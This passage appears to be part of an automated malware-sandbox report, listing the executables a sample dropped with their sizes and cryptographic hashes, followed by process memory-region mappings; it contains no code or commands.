                                              • C:\Users\Admin\AppData\Local\Temp\xerax.exe
                                                Filesize

                                                2.6MB

                                                MD5

                                                ad0cb75c2e63718ded2aff1e87797460

                                                SHA1

                                                3147252b276123f18a8b7a9454d2bb616d26c443

                                                SHA256

                                                38f6b932f8366f609b1415694cac002437aff95af435342e6a9c8db5224f5a5a

                                                SHA512

                                                ff59793d31f078e3a88a6d7b72a2523050fdbb02ab2cd9f2637dd5c4ccc90e8ccba32208140064a30a0c773e85cc4ca6f7d7aa19e7e770ed27f87e8486964c68

                                              • C:\Users\Admin\AppData\Roaming\HYWEURXVDUHK6OR\app.exe
                                                Filesize

                                                107KB

                                                MD5

                                                59ec0d84dfa73c1ef7501ad6f97f8d6f

                                                SHA1

                                                46cfc8000022f90c1a3ce2e0ff08d8ba5b8dfa49

                                                SHA256

                                                8cc6e08053bb8d9386ae9484023c2ec7345bcf1b710691926e1d7194c7f4971d

                                                SHA512

                                                8865d8084aef3aee8bd2fdc7c492592567620ecb828491ffc0ef73a1a32299ca8e0768edced32ab0dbf38f5dacf79fb44747074f7acaedeac2f7070cb94d1bbd

                                              • C:\Users\Admin\AppData\Roaming\HYWEURXVDUHK6OR\app.exe
                                                Filesize

                                                107KB

                                                MD5

                                                59ec0d84dfa73c1ef7501ad6f97f8d6f

                                                SHA1

                                                46cfc8000022f90c1a3ce2e0ff08d8ba5b8dfa49

                                                SHA256

                                                8cc6e08053bb8d9386ae9484023c2ec7345bcf1b710691926e1d7194c7f4971d

                                                SHA512

                                                8865d8084aef3aee8bd2fdc7c492592567620ecb828491ffc0ef73a1a32299ca8e0768edced32ab0dbf38f5dacf79fb44747074f7acaedeac2f7070cb94d1bbd

                                              • \??\pipe\LOCAL\crashpad_77444_NNWIZLABTPJHFMAF
                                                MD5

                                                d41d8cd98f00b204e9800998ecf8427e

                                                SHA1

                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                SHA256

                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                SHA512

                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                              • memory/764-147-0x0000000000000000-mapping.dmp
                                              • memory/1620-135-0x0000000000690000-0x000000000069A000-memory.dmp
                                                Filesize

                                                40KB

                                              • memory/1620-132-0x0000000000000000-mapping.dmp
                                              • memory/1620-186-0x00007FF8168B0000-0x00007FF817371000-memory.dmp
                                                Filesize

                                                10.8MB

                                              • memory/1620-136-0x0000000002970000-0x0000000002992000-memory.dmp
                                                Filesize

                                                136KB

                                              • memory/1620-141-0x00007FF8168B0000-0x00007FF817371000-memory.dmp
                                                Filesize

                                                10.8MB

                                              • memory/2488-143-0x0000000000000000-mapping.dmp
                                              • memory/2892-138-0x0000000000000000-mapping.dmp
                                              • memory/4844-145-0x00007FF8168B0000-0x00007FF817371000-memory.dmp
                                                Filesize

                                                10.8MB

                                              • memory/4844-142-0x00007FF8168B0000-0x00007FF817371000-memory.dmp
                                                Filesize

                                                10.8MB

                                              • memory/4844-137-0x0000000000000000-mapping.dmp
                                              • memory/6708-154-0x00007FF8168B0000-0x00007FF817371000-memory.dmp
                                                Filesize

                                                10.8MB

                                              • memory/6708-164-0x00007FF8168B0000-0x00007FF817371000-memory.dmp
                                                Filesize

                                                10.8MB

                                              • memory/6708-149-0x0000000000000000-mapping.dmp
                                              • memory/20300-151-0x0000000000000000-mapping.dmp
                                              • memory/36092-156-0x0000000000000000-mapping.dmp
                                              • memory/36104-158-0x0000000000000000-mapping.dmp
                                              • memory/38672-157-0x0000000000000000-mapping.dmp
                                              • memory/39896-161-0x0000000000000000-mapping.dmp
                                              • memory/48056-185-0x0000000000000000-mapping.dmp
                                              • memory/75148-174-0x00000000006E0000-0x0000000000794000-memory.dmp
                                                Filesize

                                                720KB

                                              • memory/75148-181-0x00000000095E0000-0x00000000095E8000-memory.dmp
                                                Filesize

                                                32KB

                                              • memory/75148-166-0x0000000000000000-mapping.dmp
                                              • memory/75148-183-0x000000000B0D0000-0x000000000B108000-memory.dmp
                                                Filesize

                                                224KB

                                              • memory/75148-184-0x000000000B0B0000-0x000000000B0BE000-memory.dmp
                                                Filesize

                                                56KB

                                              • memory/77444-182-0x0000000000000000-mapping.dmp
                                              • memory/84728-171-0x0000000000400000-0x0000000000420000-memory.dmp
                                                Filesize

                                                128KB

                                              • memory/84728-170-0x0000000000000000-mapping.dmp
                                              • memory/84728-179-0x0000000005490000-0x000000000559A000-memory.dmp
                                                Filesize

                                                1.0MB

                                              • memory/84728-177-0x0000000005900000-0x0000000005F18000-memory.dmp
                                                Filesize

                                                6.1MB

                                              • memory/84728-180-0x00000000053C0000-0x00000000053FC000-memory.dmp
                                                Filesize

                                                240KB

                                              • memory/84728-178-0x0000000005360000-0x0000000005372000-memory.dmp
                                                Filesize

                                                72KB

                                              • memory/84768-214-0x0000000000000000-mapping.dmp
                                              • memory/84880-216-0x0000000000000000-mapping.dmp
                                              • memory/84896-218-0x0000000000000000-mapping.dmp
                                              • memory/85000-221-0x0000000000000000-mapping.dmp
                                              • memory/85100-226-0x0000000000280000-0x00000000002A0000-memory.dmp
                                                Filesize

                                                128KB

                                              • memory/85100-223-0x0000000000000000-mapping.dmp
                                              • memory/85140-228-0x0000000000000000-mapping.dmp
                                              • memory/85272-230-0x0000000000000000-mapping.dmp
                                              • memory/85288-231-0x0000000000000000-mapping.dmp
                                              • memory/85872-238-0x0000000000000000-mapping.dmp
                                              • memory/85932-239-0x0000000000000000-mapping.dmp
                                              • memory/86200-240-0x0000000000000000-mapping.dmp
                                              • memory/86416-242-0x0000000000000000-mapping.dmp
                                              • memory/86492-244-0x0000000000000000-mapping.dmp
                                              • memory/86544-246-0x0000000000000000-mapping.dmp
                                              • memory/86600-247-0x0000000000000000-mapping.dmp
                                              • memory/86656-249-0x0000000000000000-mapping.dmp
                                              • memory/86720-251-0x0000000000000000-mapping.dmp
                                              • memory/130736-206-0x0000000004C50000-0x0000000004CB6000-memory.dmp
                                                Filesize

                                                408KB

                                              • memory/130736-207-0x0000000005D40000-0x00000000062E4000-memory.dmp
                                                Filesize

                                                5.6MB

                                              • memory/130736-232-0x00000000063B0000-0x0000000006400000-memory.dmp
                                                Filesize

                                                320KB

                                              • memory/130736-233-0x00000000065D0000-0x0000000006792000-memory.dmp
                                                Filesize

                                                1.8MB

                                              • memory/130736-234-0x0000000006CD0000-0x00000000071FC000-memory.dmp
                                                Filesize

                                                5.2MB

                                              • memory/130736-222-0x0000000005940000-0x000000000595E000-memory.dmp
                                                Filesize

                                                120KB

                                              • memory/130736-188-0x0000000000000000-mapping.dmp
                                              • memory/130736-190-0x0000000000412000-0x0000000000428000-memory.dmp
                                                Filesize

                                                88KB

                                              • memory/130736-208-0x0000000005830000-0x00000000058C2000-memory.dmp
                                                Filesize

                                                584KB

                                              • memory/130736-219-0x0000000005980000-0x00000000059F6000-memory.dmp
                                                Filesize

                                                472KB

                                              • memory/130736-191-0x0000000000410000-0x000000000042C000-memory.dmp
                                                Filesize

                                                112KB

                                              • memory/135700-210-0x0000000000000000-mapping.dmp
                                              • memory/135720-212-0x0000000000000000-mapping.dmp
                                              • memory/135936-193-0x0000000000000000-mapping.dmp
                                              • memory/136064-201-0x0000000000000000-mapping.dmp
                                              • memory/136092-202-0x0000000000000000-mapping.dmp
                                              • memory/136148-205-0x0000000000000000-mapping.dmp